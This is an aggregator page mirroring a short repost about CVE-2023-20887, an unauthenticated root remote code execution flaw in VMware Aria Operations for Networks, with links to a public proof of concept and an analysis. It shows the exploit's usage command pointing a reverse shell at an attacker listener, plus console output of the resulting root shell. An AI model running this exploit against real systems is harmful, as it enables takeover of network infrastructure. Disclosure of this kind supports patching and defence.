11
CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) un...
source link: https://movaxbx.ru/2023/06/13/cve-2023-20887-vmware-aria-operations-for-networks-vrealize-network-insight-unauthenticated-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE
Original text by summoning.team
PoC https://github.com/sinsinology/CVE-2023-20887 for CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE
This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.
RCA here https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
Usage:
$python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
$ sudo bash
uid=0(root) gid=0(root) groups=0(root)
$ hostname
vrni-platform-release
$python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337 VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) (*) Starting handler (+) Received connection from 192.168.116.100 (+) pop thy shell! (it's ready) $ sudo bash $ id uid=0(root) gid=0(root) groups=0(root) $ hostname vrni-platform-release
Поделиться ссылкой:
Понравилось это:
Загрузка...
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK